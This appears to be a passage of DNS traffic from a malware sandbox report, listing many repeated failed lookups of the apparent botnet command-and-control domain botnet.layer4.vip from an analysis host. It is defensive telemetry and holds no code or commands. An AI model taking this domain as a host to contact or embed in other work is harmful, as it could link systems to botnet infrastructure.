                                  Apr 9, 2023 03:30:40.305309057 CEST8.8.8.8192.168.2.230x59a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.329530954 CEST8.8.8.8192.168.2.230x59a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.353673935 CEST8.8.8.8192.168.2.230x59a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.369604111 CEST8.8.8.8192.168.2.230x59a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.385481119 CEST8.8.8.8192.168.2.230x59a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.401715994 CEST8.8.8.8192.168.2.230x78beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.426242113 CEST8.8.8.8192.168.2.230x78beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.450416088 CEST8.8.8.8192.168.2.230x78beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.466293097 CEST8.8.8.8192.168.2.230x78beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.490401983 CEST8.8.8.8192.168.2.230x78beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.506120920 CEST8.8.8.8192.168.2.230x3a75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.521984100 CEST8.8.8.8192.168.2.230x3a75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.546108007 CEST8.8.8.8192.168.2.230x3a75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.570580959 CEST8.8.8.8192.168.2.230x3a75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.594984055 CEST8.8.8.8192.168.2.230x3a75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.619282961 CEST8.8.8.8192.168.2.230x55daName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.643464088 CEST8.8.8.8192.168.2.230x55daName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.659514904 CEST8.8.8.8192.168.2.230x55daName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.683665991 CEST8.8.8.8192.168.2.230x55daName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.708065033 CEST8.8.8.8192.168.2.230x55daName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.728707075 CEST8.8.8.8192.168.2.230xcdb0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.752865076 CEST8.8.8.8192.168.2.230xcdb0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.777349949 CEST8.8.8.8192.168.2.230xcdb0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.793504953 CEST8.8.8.8192.168.2.230xcdb0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.817699909 CEST8.8.8.8192.168.2.230xcdb0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.842506886 CEST8.8.8.8192.168.2.230xf6d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.858540058 CEST8.8.8.8192.168.2.230xf6d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.874730110 CEST8.8.8.8192.168.2.230xf6d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.890666962 CEST8.8.8.8192.168.2.230xf6d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.907264948 CEST8.8.8.8192.168.2.230xf6d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.923032045 CEST8.8.8.8192.168.2.230x2ad0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.938864946 CEST8.8.8.8192.168.2.230x2ad0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.954497099 CEST8.8.8.8192.168.2.230x2ad0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.970042944 CEST8.8.8.8192.168.2.230x2ad0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.994514942 CEST8.8.8.8192.168.2.230x2ad0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.010637999 CEST8.8.8.8192.168.2.230x2b1dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.034985065 CEST8.8.8.8192.168.2.230x2b1dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.059619904 CEST8.8.8.8192.168.2.230x2b1dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.075546980 CEST8.8.8.8192.168.2.230x2b1dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.100083113 CEST8.8.8.8192.168.2.230x2b1dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.124623060 CEST8.8.8.8192.168.2.230x79f3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.140481949 CEST8.8.8.8192.168.2.230x79f3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.164716005 CEST8.8.8.8192.168.2.230x79f3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.180296898 CEST8.8.8.8192.168.2.230x79f3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.204821110 CEST8.8.8.8192.168.2.230x79f3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.229418039 CEST8.8.8.8192.168.2.230x7ce0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.245210886 CEST8.8.8.8192.168.2.230x7ce0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.269880056 CEST8.8.8.8192.168.2.230x7ce0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.286036015 CEST8.8.8.8192.168.2.230x7ce0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.301826000 CEST8.8.8.8192.168.2.230x7ce0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.326391935 CEST8.8.8.8192.168.2.230x3fa7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.342253923 CEST8.8.8.8192.168.2.230x3fa7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.366919041 CEST8.8.8.8192.168.2.230x3fa7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.382682085 CEST8.8.8.8192.168.2.230x3fa7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.406986952 CEST8.8.8.8192.168.2.230x3fa7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.431469917 CEST8.8.8.8192.168.2.230xb072Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.447202921 CEST8.8.8.8192.168.2.230xb072Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.471453905 CEST8.8.8.8192.168.2.230xb072Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.495771885 CEST8.8.8.8192.168.2.230xb072Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.511744022 CEST8.8.8.8192.168.2.230xb072Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.527823925 CEST8.8.8.8192.168.2.230xd1d5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.543545961 CEST8.8.8.8192.168.2.230xd1d5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.559318066 CEST8.8.8.8192.168.2.230xd1d5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.583827972 CEST8.8.8.8192.168.2.230xd1d5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.599761963 CEST8.8.8.8192.168.2.230xd1d5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.615853071 CEST8.8.8.8192.168.2.230x8266Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.631464958 CEST8.8.8.8192.168.2.230x8266Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.655905962 CEST8.8.8.8192.168.2.230x8266Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.671631098 CEST8.8.8.8192.168.2.230x8266Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.696238995 CEST8.8.8.8192.168.2.230x8266Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.738451958 CEST8.8.8.8192.168.2.230x8f80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.763114929 CEST8.8.8.8192.168.2.230x8f80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.778925896 CEST8.8.8.8192.168.2.230x8f80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.803256035 CEST8.8.8.8192.168.2.230x8f80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.819565058 CEST8.8.8.8192.168.2.230x8f80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.844001055 CEST8.8.8.8192.168.2.230xff38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.859574080 CEST8.8.8.8192.168.2.230xff38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.883698940 CEST8.8.8.8192.168.2.230xff38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.899228096 CEST8.8.8.8192.168.2.230xff38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.914552927 CEST8.8.8.8192.168.2.230xff38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.938580036 CEST8.8.8.8192.168.2.230xc2bbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.954190016 CEST8.8.8.8192.168.2.230xc2bbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.970103979 CEST8.8.8.8192.168.2.230xc2bbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:41.985948086 CEST8.8.8.8192.168.2.230xc2bbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.001540899 CEST8.8.8.8192.168.2.230xc2bbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.025799990 CEST8.8.8.8192.168.2.230xf4e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.050256968 CEST8.8.8.8192.168.2.230xf4e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.066092968 CEST8.8.8.8192.168.2.230xf4e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.090529919 CEST8.8.8.8192.168.2.230xf4e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.115170002 CEST8.8.8.8192.168.2.230xf4e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.139906883 CEST8.8.8.8192.168.2.230x5438Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.155651093 CEST8.8.8.8192.168.2.230x5438Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.180361986 CEST8.8.8.8192.168.2.230x5438Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.204683065 CEST8.8.8.8192.168.2.230x5438Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.220758915 CEST8.8.8.8192.168.2.230x5438Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.236804962 CEST8.8.8.8192.168.2.230xbef2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.261003017 CEST8.8.8.8192.168.2.230xbef2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.276595116 CEST8.8.8.8192.168.2.230xbef2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.300762892 CEST8.8.8.8192.168.2.230xbef2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.316725969 CEST8.8.8.8192.168.2.230xbef2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.341053963 CEST8.8.8.8192.168.2.230xaa56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.357177019 CEST8.8.8.8192.168.2.230xaa56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.381767988 CEST8.8.8.8192.168.2.230xaa56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.406359911 CEST8.8.8.8192.168.2.230xaa56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.430661917 CEST8.8.8.8192.168.2.230xaa56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.446760893 CEST8.8.8.8192.168.2.230x5a2eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.462436914 CEST8.8.8.8192.168.2.230x5a2eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.486968994 CEST8.8.8.8192.168.2.230x5a2eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.511106968 CEST8.8.8.8192.168.2.230x5a2eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.535207033 CEST8.8.8.8192.168.2.230x5a2eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.551301003 CEST8.8.8.8192.168.2.230xbac7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.566879988 CEST8.8.8.8192.168.2.230xbac7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.582387924 CEST8.8.8.8192.168.2.230xbac7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.606523991 CEST8.8.8.8192.168.2.230xbac7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.622123957 CEST8.8.8.8192.168.2.230xbac7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.637927055 CEST8.8.8.8192.168.2.230x539fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.662385941 CEST8.8.8.8192.168.2.230x539fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.678467035 CEST8.8.8.8192.168.2.230x539fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.694113016 CEST8.8.8.8192.168.2.230x539fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.718502998 CEST8.8.8.8192.168.2.230x539fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.743392944 CEST8.8.8.8192.168.2.230xbb6aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.767658949 CEST8.8.8.8192.168.2.230xbb6aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.783276081 CEST8.8.8.8192.168.2.230xbb6aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.807357073 CEST8.8.8.8192.168.2.230xbb6aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.831794024 CEST8.8.8.8192.168.2.230xbb6aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.856462955 CEST8.8.8.8192.168.2.230xa36fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.881210089 CEST8.8.8.8192.168.2.230xa36fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.897152901 CEST8.8.8.8192.168.2.230xa36fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.921612024 CEST8.8.8.8192.168.2.230xa36fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.945532084 CEST8.8.8.8192.168.2.230xa36fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.969922066 CEST8.8.8.8192.168.2.230x3978Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:42.993964911 CEST8.8.8.8192.168.2.230x3978Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.017961979 CEST8.8.8.8192.168.2.230x3978Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.042109013 CEST8.8.8.8192.168.2.230x3978Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.066543102 CEST8.8.8.8192.168.2.230x3978Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.090827942 CEST8.8.8.8192.168.2.230x1d38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.106311083 CEST8.8.8.8192.168.2.230x1d38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.121964931 CEST8.8.8.8192.168.2.230x1d38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.146008968 CEST8.8.8.8192.168.2.230x1d38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.161540985 CEST8.8.8.8192.168.2.230x1d38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.185745001 CEST8.8.8.8192.168.2.230x2bb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.201332092 CEST8.8.8.8192.168.2.230x2bb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.225625038 CEST8.8.8.8192.168.2.230x2bb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.249666929 CEST8.8.8.8192.168.2.230x2bb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.273797035 CEST8.8.8.8192.168.2.230x2bb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.298049927 CEST8.8.8.8192.168.2.230x8602Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.322180033 CEST8.8.8.8192.168.2.230x8602Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.346627951 CEST8.8.8.8192.168.2.230x8602Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.362245083 CEST8.8.8.8192.168.2.230x8602Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.386715889 CEST8.8.8.8192.168.2.230x8602Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.410928011 CEST8.8.8.8192.168.2.230x7adeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.426857948 CEST8.8.8.8192.168.2.230x7adeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.442358971 CEST8.8.8.8192.168.2.230x7adeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.458403111 CEST8.8.8.8192.168.2.230x7adeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.474023104 CEST8.8.8.8192.168.2.230x7adeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.489650965 CEST8.8.8.8192.168.2.230xa80cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.513999939 CEST8.8.8.8192.168.2.230xa80cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.538130045 CEST8.8.8.8192.168.2.230xa80cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.553966045 CEST8.8.8.8192.168.2.230xa80cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.569904089 CEST8.8.8.8192.168.2.230xa80cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.594125032 CEST8.8.8.8192.168.2.230x303Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.618372917 CEST8.8.8.8192.168.2.230x303Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.634206057 CEST8.8.8.8192.168.2.230x303Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.658668995 CEST8.8.8.8192.168.2.230x303Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.674536943 CEST8.8.8.8192.168.2.230x303Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.699172974 CEST8.8.8.8192.168.2.230xdf65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.727094889 CEST8.8.8.8192.168.2.230xdf65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.751473904 CEST8.8.8.8192.168.2.230xdf65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.775861025 CEST8.8.8.8192.168.2.230xdf65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.800288916 CEST8.8.8.8192.168.2.230xdf65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.816278934 CEST8.8.8.8192.168.2.230xc6d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.840615034 CEST8.8.8.8192.168.2.230xc6d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.864711046 CEST8.8.8.8192.168.2.230xc6d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.888761044 CEST8.8.8.8192.168.2.230xc6d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.904341936 CEST8.8.8.8192.168.2.230xc6d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.928805113 CEST8.8.8.8192.168.2.230x385Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.952831030 CEST8.8.8.8192.168.2.230x385Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.977238894 CEST8.8.8.8192.168.2.230x385Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:43.993072033 CEST8.8.8.8192.168.2.230x385Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.008631945 CEST8.8.8.8192.168.2.230x385Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.024558067 CEST8.8.8.8192.168.2.230xbed5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.048695087 CEST8.8.8.8192.168.2.230xbed5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.072957993 CEST8.8.8.8192.168.2.230xbed5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.088596106 CEST8.8.8.8192.168.2.230xbed5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:44.104434013 CEST8.8.8.8192.168.2.230xbed5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
